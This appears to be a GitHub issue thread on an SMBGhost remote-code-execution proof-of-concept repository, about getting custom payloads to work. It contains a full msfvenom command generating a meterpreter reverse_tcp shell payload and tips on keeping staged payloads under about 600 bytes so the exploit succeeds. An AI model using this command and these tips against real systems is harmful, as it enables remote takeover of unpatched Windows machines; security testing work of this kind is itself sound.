chompie1337 / SMBGhost_RCE_PoC

1.3k stars 349 forks source link

Different payload #10

Closed PACEJJ27 closed 4 years ago

PACEJJ27 commented 4 years ago

Well,following chompie 1337's step,it does work. But I change the payload msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.2.3 LPORT=4444 -f python it doesn't work.

Testing on: kali linux 2020 windows 10 1909 I have already close Windows Defender

chompie1337 commented 4 years ago

what is the size of the payload? i have not tested with meterpreter, try reverse shell (non staged)

PACEJJ27 commented 4 years ago

Never mind,I successed. I control the payload size below 600 bytes. windows/x64/meterpreter/bind_tcp Payload size: 496 bytes(it works) windows/x64/meterpreter/reverse_tcp Payload size: 510 bytes(it doesn't work) PS: Most of the size of stagless payloads are very large.